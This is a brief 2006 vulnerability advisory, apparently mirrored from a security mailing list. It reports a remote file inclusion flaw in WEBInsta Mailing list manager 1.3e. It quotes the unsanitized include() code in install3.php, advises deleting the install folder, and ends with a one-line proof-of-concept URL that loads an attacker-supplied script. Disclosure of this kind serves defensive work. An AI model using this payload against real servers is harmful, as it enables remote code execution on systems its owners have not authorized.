Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13882
HistoryAug 14, 2006 - 12:00 a.m.

WEBInsta Mailing list manager (cabsolute_path) 1.3e RFI

2006-08-1400:00:00
vulners.com
27

±-------------------------------------------------------------------
+

±-------------------------------------------------------------------
+

  • Affected Software .: WEBInsta™ Mailing list manager 1.3e
  • Venedor …: http://www.webinsta.com
  • Class …: Remote File Inclusion
  • Risk …: high (Remote File Execution)
  • Found by …: Philipp Niedziela
  • Contact …: webmaster[at]bb-pcsecurity[.]de

±-------------------------------------------------------------------
+

  • Code /istall/install3.php:
  • if($database=="none")
  • {
  • include($cabsolute_path.'inc/adodbt/db.inc');
  • $conn = &ADONewConnection();

±-------------------------------------------------------------------
+

  • $cabsolute_path is not properly sanitized before being used

±-------------------------------------------------------------------
+

  • Solution:
  • Delete folder "install" after installation!!

±-------------------------------------------------------------------
+

  • PoC:
  • http://[target]/install/install3.php?database=none&cabsolute_path=[script]

±-------------------------------------------------------------------
+

  • Greets: /str0ke

±------------------------[ E O F ]----------------------------------